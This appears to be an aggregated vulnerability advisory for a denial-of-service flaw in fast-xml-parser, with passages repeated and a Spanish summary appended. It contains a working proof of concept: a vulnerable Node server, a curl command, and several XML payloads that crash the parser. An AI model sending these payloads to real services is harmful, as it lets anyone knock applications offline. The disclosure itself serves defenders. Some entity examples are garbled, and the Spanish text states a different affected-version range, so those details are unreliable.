CVE-2026-25128

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `�` or `�`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 5.0.9 through 5.3.3, a RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `�` or `�`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. Version 5.3.4 fixes the issue.

### Summary A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `&#9999999;` or `&#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. ### Details The vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45: ```javascript "num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) }, "num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) }, ``` The `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this: - `[0-9]{1,7}` matches up to 9,999,999 - `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215) The entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch: ```javascript val = val.replace(entity.regex, entity.val); ``` This causes the RangeError to propagate uncaught, crashing the parser and any application using it. ### PoC #### Setup Create a directory with these files: ``` poc/ ├── package.json ├── server.js ``` **package.json** ```json { "dependencies": { "fast-xml-parser": "^5.3.3" } } ``` **server.js** ```javascript const http = require('http'); const { XMLParser } = require('fast-xml-parser'); const parser = new XMLParser({ processEntities: true, htmlEntities: true }); http.createServer((req, res) => { if (req.method === 'POST' && req.url === '/parse') { let body = ''; req.on('data', c => body += c); req.on('end', () => { const result = parser.parse(body); // No try-catch - will crash! res.end(JSON.stringify(result)); }); } else { res.end('POST /parse with XML body'); } }).listen(3000, () => console.log('http://localhost:3000')); ``` #### Run ```bash # Setup npm install # Terminal 1: Start server node server.js # Terminal 2: Send malicious payload (server will crash) curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>&#9999999;</root>' http://localhost:3000/parse ``` #### Result Server crashes with: ``` RangeError: Invalid code point 9999999 ``` #### Alternative Payloads ```xml <!-- Hex variant --> <?xml version="1.0"?><root>&#xFFFFFF;</root> <!-- In attribute --> <?xml version="1.0"?><root attr="&#9999999;"/> ``` ### Impact *Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects: - **API servers** accepting XML payloads - **File processors** parsing uploaded XML files - **Message queues** consuming XML messages - **RSS/Atom feed parsers** - **SOAP/XML-RPC services** A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.

### Summary A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `&#9999999;` or `&#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input. ### Details The vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45: ```javascript "num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) }, "num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) }, ``` The `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this: - `[0-9]{1,7}` matches up to 9,999,999 - `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215) The entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch: ```javascript val = val.replace(entity.regex, entity.val); ``` This causes the RangeError to propagate uncaught, crashing the parser and any application using it. ### PoC #### Setup Create a directory with these files: ``` poc/ ├── package.json ├── server.js ``` **package.json** ```json { "dependencies": { "fast-xml-parser": "^5.3.3" } } ``` **server.js** ```javascript const http = require('http'); const { XMLParser } = require('fast-xml-parser'); const parser = new XMLParser({ processEntities: true, htmlEntities: true }); http.createServer((req, res) => { if (req.method === 'POST' && req.url === '/parse') { let body = ''; req.on('data', c => body += c); req.on('end', () => { const result = parser.parse(body); // No try-catch - will crash! res.end(JSON.stringify(result)); }); } else { res.end('POST /parse with XML body'); } }).listen(3000, () => console.log('http://localhost:3000')); ``` #### Run ```bash # Setup npm install # Terminal 1: Start server node server.js # Terminal 2: Send malicious payload (server will crash) curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>&#9999999;</root>' http://localhost:3000/parse ``` #### Result Server crashes with: ``` RangeError: Invalid code point 9999999 ``` #### Alternative Payloads ```xml <!-- Hex variant --> <?xml version="1.0"?><root>&#xFFFFFF;</root> <!-- In attribute --> <?xml version="1.0"?><root attr="&#9999999;"/> ``` ### Impact *Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects: - **API servers** accepting XML payloads - **File processors** parsing uploaded XML files - **Message queues** consuming XML messages - **RSS/Atom feed parsers** - **SOAP/XML-RPC services** A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.

fast-xml-parser permite a los usuarios validar XML, analizar XML a objeto JS o construir XML desde objeto JS sin librerías basadas en C/C++ y sin callback. En las versiones 4.3.6 a la 5.3.3, existe una vulnerabilidad de tipo RangeError en el procesamiento de entidades numéricas de fast-xml-parser al analizar XML con puntos de código de entidad fuera de rango (p. ej., '?' o '?'). Esto provoca que el analizador lance una excepción no capturada, lo que bloquea cualquier aplicación que procesa entrada XML no confiable. La versión 5.3.4 corrige el problema.